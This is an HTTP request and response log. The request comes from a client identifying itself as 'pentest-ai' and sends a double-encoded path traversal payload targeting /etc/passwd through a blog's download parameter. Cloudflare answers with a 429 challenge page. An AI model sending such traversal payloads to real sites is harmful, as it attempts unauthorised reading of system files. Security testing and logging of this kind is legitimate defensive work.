REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9869
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83ba139b0a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=1m0jbFNEeM0yL2u5iXGUzjNLy6O0YwkvthXhdEyGA7F%2BXfQcPVPnankv9qnp7VBioQEZrdjkalSzyHYiRm4XPtJjgkAHmWqXKNWlaCbpHPLV9CwC%2FKMpLzWN6bQ4h97eGtgLDjcbs5Zbx0NJzw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83ba139b0a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'd9xPIyoJByurt0dv8tPjd3bSYfSf6PBUBo4Ndkz46gw-1784280678-1.2.1.1-mAaR4fHnBrWFAw5p8A49aEur8merQKwb3VLhvynyo.tnBzHx1NojS4EOhyZOTJ.t',cITimeS: '1784280678',cRay: 'a1c83ba139b0a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_tk=GwvKeY9_J6FR1w.Bolmzuc3d.JdW5YqK9CkidaxGE.c-1784280678-1.0.1.1-G7SWD_c9yZ8ca5ZCUT4RXl5bc.khUHMbQkHKTWHSC9U",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=GwvKeY9_J6FR1w.Bolmzuc3d.JdW5YqK9CkidaxGE.c-1784280678-1.0.1.1-G7SWD_c9yZ8ca5ZCUT4RXl5bc.khUHMbQkHKTWHSC9U",md: 'Ptpzmr6oP7Yx0gzxCVltj6jIc9Ihl6qmsttsL_Epj0k-1784280678-1.2.1.1-Bjb3feYq3EmdqUW9VOuJohE6l_GV_P0MG5yurm8sFkIfKa5NvwdoGNJHi7mEpsP_VsgH1SkKe.eS3t0q5QuNmF.sFCDlFZvA3DTE_ifwgsY0A0lN1MOsfKP_lDVvVsZeChMM3hFZYzP6lvv3e2nar8Z4VLbp61gxRMmTspXRD4r6cfN2Ji42KBXV3sb1W6UU4W3aqI7qr.gpjlnOp_eZ8L.g5LaRnPAi.otlaWZCjSPFIaq64PFwJa_y2E635IUxrLkDcJS6bpA4eje7jL26ikeqkZf3c.YxwxnBbl9MF6AWWXsZ0HbM9BA_K6mFcLweovs9o7McmZQ9_WcteCwK6r0MSNOHgDgfsYmX3wGJpIbxpYSCUhA_rl3XpuT17IFFTdiJGlDUqHpsbRNOFG7CkvvJsP8SiHAqzMRu0LiVW6XNTp.0PxHESrFlFXb8_CNYNcPlevVgkmSpnjZWwVkxnOoT9lXdLjTvyNWXW9BrjIRQ6n2XVelfTPodynJGOo32u4ff6P.inpK7oobalLN_SX83n97YQXs1bKvpkW9jsvhS8E10Atdf3HIs3NalA35Pf8fhY9t8iG5zgo482L.OlzZsSOA59DP2brZPK_NcaZUy7DAYRjS7nMwL3kG7OsGXZkaNp5tCaEZTGEGeenIjmMpc6aBXSGbimXaW.xkEY87CrZesZuWQQyjbToY7fynhNcqgfxgNAGHqJqtOxiE32Nb5asw0i_hX3zaGjko70VIYt_RM4Hp3kxIcDMidB9.rU6mMXFoBSnYKhjPzNqMEhZj8JVDegeAe60SZNEFi1ebrB09.ktbtIyu_WLeyaks63CmaTw2YV.kTtxUKiKRWMAw9i4n5kRHr3uzS6prhx0QPVDMMSJX2jwzowDw3TUPYj_4LNrnsQfsUKc83WMXLLG96qAR5Xy2LVRlcMB_sZQ8KUcGsa.xNeY_wWnLfyFgQvrPDcRSCN8Bwx3C9wxW2ln17LVFGlBgeZDt_fVcIEOEIpM81d3ml3GMzsfBA4Exb5kEc_kwOwfxOZs0wnxwtY5hh5uWpmuZU1J63X5Wp6qvbCPm8nS9gqqaGVcruzXkRHZ_nU7KRgSaJZ5vAYB8HnO8A8yyQ9eIXAQEN2xj191OcutKb9._m76gbC_.l7NQ83oMCtfCdprO0KcYHEImtz.gpQrTwqQqoKCWES4t8tKDl_5FeyuC.NiyCp12B4iXuEqvxI_ljL33f1K8og6LTIuG3AIqMLsvLFQCs3sDcPKyJRH9Oxu1xmo.WFDhi1yjXlDiYvxOZjQySAOEV.kPxAuuowr7gqqm8faOKGOWSFAtkDlTnE_834R5VgbFuFGjomR2pbVkFU3u3pC2Q.PYZ4A',mdrd: 'oElWcUhgftviWHs1pXUnGaDWry5m2DWpXgDf4HXPPIY-1784280678-1.2.1.1-C_HAP2zZlEeJSf_pOv8RfIozPUc0icWZyQZDR0EBgX00Nc.wM99.LeRCG.I.82WlYGJldDjtQiXcbBatVrDE.6nf4Phv4Szfk20PsLFWtu70R.17rfhG6bCfmOMFiTzmIa7i7kvk9NjxyznXy_PW8Q.irggOngVOUgQgyUl5S.PGWqMctpTL4EEH9ws.nONY4KAu3KWiIEBuizZXfHANc8ipFgUC77f_edkwZ.wC4XVPHDfSKU3x1tJ976X2pHQW',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83ba139b0a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?doc=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=GwvKeY9_J6FR1w.Bolmzuc3d.JdW5YqK9CkidaxGE.c-1784280678-1.0.1.1-G7SWD_c9yZ8ca5ZCUT4RXl5bc.khUHMbQkHKTWHSC9U"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
